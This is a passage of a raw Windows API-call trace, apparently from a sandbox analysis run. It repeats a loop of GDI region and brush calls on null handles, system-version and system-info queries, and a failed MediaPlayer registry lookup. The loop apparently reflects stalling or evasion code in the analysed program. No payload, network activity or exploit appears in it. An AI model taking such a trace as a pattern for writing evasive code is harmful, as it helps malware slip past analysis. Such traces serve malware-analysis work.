(hdc=0x0) returned 0 [0087.554] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.554] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.554] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.554] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.554] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.554] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.554] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.554] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x500401d9 [0087.554] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e0401dc [0087.554] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040714 [0087.554] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040715 [0087.554] CombineRgn (hrgnDst=0x5040714, hrgnSrc1=0x500401d9, hrgnSrc2=0x4e0401dc, iMode=1) returned 1 [0087.554] CombineRgn (hrgnDst=0x3040715, hrgnSrc1=0x500401d9, hrgnSrc2=0x4e0401dc, iMode=4) returned 2 [0087.554] CreateSolidBrush (color=0xff) returned 0x4100721 [0087.554] CreateSolidBrush (color=0xff0000) returned 0x5100724 [0087.554] DeleteObject (ho=0x5100724) returned 1 [0087.554] DeleteObject (ho=0x4e0401dc) returned 1 [0087.554] DeleteObject (ho=0x500401d9) returned 1 [0087.554] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.554] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.554] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.555] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.555] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.555] BeginPath (hdc=0x0) returned 0 [0087.555] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.555] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.555] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.555] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.555] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.555] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.555] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.555] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.555] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f0401dc [0087.555] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x510401d9 [0087.555] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040725 [0087.555] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040716 [0087.555] CombineRgn (hrgnDst=0x3040725, hrgnSrc1=0x4f0401dc, hrgnSrc2=0x510401d9, iMode=1) returned 1 [0087.555] CombineRgn (hrgnDst=0x5040716, hrgnSrc1=0x4f0401dc, hrgnSrc2=0x510401d9, iMode=4) returned 2 [0087.555] CreateSolidBrush (color=0xff) returned 0x6100724 [0087.555] CreateSolidBrush (color=0xff0000) returned 0x3100717 [0087.555] DeleteObject (ho=0x3100717) returned 1 [0087.555] DeleteObject (ho=0x510401d9) returned 1 [0087.555] DeleteObject (ho=0x4f0401dc) returned 1 [0087.555] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.555] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.555] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.555] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.555] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.555] BeginPath (hdc=0x0) returned 0 [0087.555] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.555] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.555] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.555] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.555] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.555] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.555] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.555] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.555] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x520401d9 [0087.555] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x500401dc [0087.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040718 [0087.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040719 [0087.556] CombineRgn (hrgnDst=0x5040718, hrgnSrc1=0x520401d9, hrgnSrc2=0x500401dc, iMode=1) returned 1 [0087.556] CombineRgn (hrgnDst=0x3040719, hrgnSrc1=0x520401d9, hrgnSrc2=0x500401dc, iMode=4) returned 2 [0087.556] CreateSolidBrush (color=0xff) returned 0x4100717 [0087.556] CreateSolidBrush (color=0xff0000) returned 0x5100726 [0087.556] DeleteObject (ho=0x5100726) returned 1 [0087.556] DeleteObject (ho=0x500401dc) returned 1 [0087.556] DeleteObject (ho=0x520401d9) returned 1 [0087.556] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.556] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.556] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.556] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.556] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.556] BeginPath (hdc=0x0) returned 0 [0087.556] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.556] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.556] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.556] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.556] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.556] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.556] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.556] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.556] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x510401dc [0087.556] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x530401d9 [0087.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040727 [0087.556] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040728 [0087.556] CombineRgn (hrgnDst=0x3040727, hrgnSrc1=0x510401dc, hrgnSrc2=0x530401d9, iMode=1) returned 1 [0087.556] CombineRgn (hrgnDst=0x5040728, hrgnSrc1=0x510401dc, hrgnSrc2=0x530401d9, iMode=4) returned 2 [0087.556] CreateSolidBrush (color=0xff) returned 0x6100726 [0087.556] CreateSolidBrush (color=0xff0000) returned 0x3100729 [0087.556] DeleteObject (ho=0x3100729) returned 1 [0087.556] DeleteObject (ho=0x530401d9) returned 1 [0087.556] DeleteObject (ho=0x510401dc) returned 1 [0087.556] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.556] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.556] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.556] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.556] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.556] BeginPath (hdc=0x0) returned 0 [0087.556] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.556] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.556] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.557] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.557] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.557] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.557] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.557] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x540401d9 [0087.557] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x520401dc [0087.557] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040276 [0087.557] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204027b [0087.557] CombineRgn (hrgnDst=0x5040276, hrgnSrc1=0x540401d9, hrgnSrc2=0x520401dc, iMode=1) returned 1 [0087.557] CombineRgn (hrgnDst=0x204027b, hrgnSrc1=0x540401d9, hrgnSrc2=0x520401dc, iMode=4) returned 2 [0087.557] CreateSolidBrush (color=0xff) returned 0x4100729 [0087.557] CreateSolidBrush (color=0xff0000) returned 0x210027e [0087.557] DeleteObject (ho=0x210027e) returned 1 [0087.557] DeleteObject (ho=0x520401dc) returned 1 [0087.557] DeleteObject (ho=0x540401d9) returned 1 [0087.557] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.557] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.557] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.557] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.557] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.557] BeginPath (hdc=0x0) returned 0 [0087.557] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.557] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.557] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.557] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.557] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.557] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.557] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.557] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.557] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x530401dc [0087.557] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x550401d9 [0087.557] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204027f [0087.557] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2040280 [0087.557] CombineRgn (hrgnDst=0x204027f, hrgnSrc1=0x530401dc, hrgnSrc2=0x550401d9, iMode=1) returned 1 [0087.557] CombineRgn (hrgnDst=0x2040280, hrgnSrc1=0x530401dc, hrgnSrc2=0x550401d9, iMode=4) returned 2 [0087.557] CreateSolidBrush (color=0xff) returned 0x310027e [0087.557] CreateSolidBrush (color=0xff0000) returned 0x210027d [0087.558] DeleteObject (ho=0x210027d) returned 1 [0087.558] DeleteObject (ho=0x550401d9) returned 1 [0087.558] DeleteObject (ho=0x530401dc) returned 1 [0087.558] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.558] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.558] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.558] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.558] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.558] BeginPath (hdc=0x0) returned 0 [0087.558] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.558] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.558] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.558] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.558] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.558] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.558] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.244] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x560401d9 [0089.244] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x540401dc [0089.244] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045591 [0089.244] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045592 [0089.244] CombineRgn (hrgnDst=0x1045591, hrgnSrc1=0x560401d9, hrgnSrc2=0x540401dc, iMode=1) returned 1 [0089.244] CombineRgn (hrgnDst=0x1045592, hrgnSrc1=0x560401d9, hrgnSrc2=0x540401dc, iMode=4) returned 2 [0089.244] CreateSolidBrush (color=0xff) returned 0x310027d [0089.244] CreateSolidBrush (color=0xff0000) returned 0x1105593 [0089.244] DeleteObject (ho=0x1105593) returned 1 [0089.244] DeleteObject (ho=0x540401dc) returned 1 [0089.244] DeleteObject (ho=0x560401d9) returned 1 [0089.245] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.245] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.245] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.245] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.245] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.245] BeginPath (hdc=0x0) returned 0 [0089.245] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.245] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.245] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.245] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.245] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.245] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.245] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.245] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.245] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x550401dc [0089.245] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x570401d9 [0089.245] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045594 [0089.245] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045595 [0089.245] CombineRgn (hrgnDst=0x1045594, hrgnSrc1=0x550401dc, hrgnSrc2=0x570401d9, iMode=1) returned 1 [0089.245] CombineRgn (hrgnDst=0x1045595, hrgnSrc1=0x550401dc, hrgnSrc2=0x570401d9, iMode=4) returned 2 [0089.245] CreateSolidBrush (color=0xff) returned 0x2105593 [0089.245] CreateSolidBrush (color=0xff0000) returned 0x1105596 [0089.245] DeleteObject (ho=0x1105596) returned 1 [0089.245] DeleteObject (ho=0x570401d9) returned 1 [0089.245] DeleteObject (ho=0x550401dc) returned 1 [0089.245] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.245] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.245] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.245] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.245] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.245] BeginPath (hdc=0x0) returned 0 [0089.245] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.245] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.245] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.246] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.246] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.246] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.246] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.246] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.246] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x580401d9 [0089.246] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x560401dc [0089.246] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045597 [0089.246] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045598 [0089.246] CombineRgn (hrgnDst=0x1045597, hrgnSrc1=0x580401d9, hrgnSrc2=0x560401dc, iMode=1) returned 1 [0089.246] CombineRgn (hrgnDst=0x1045598, hrgnSrc1=0x580401d9, hrgnSrc2=0x560401dc, iMode=4) returned 2 [0089.246] CreateSolidBrush (color=0xff) returned 0x2105596 [0089.246] CreateSolidBrush (color=0xff0000) returned 0x1105599 [0089.246] DeleteObject (ho=0x1105599) returned 1 [0089.246] DeleteObject (ho=0x560401dc) returned 1 [0089.246] DeleteObject (ho=0x580401d9) returned 1 [0089.246] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.246] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.246] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.246] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.246] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.246] BeginPath (hdc=0x0) returned 0 [0089.246] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.246] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.246] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.246] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.246] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.246] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.246] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.246] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.246] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x570401dc [0089.246] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x590401d9 [0089.246] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104559a [0089.246] CreateRectRgn 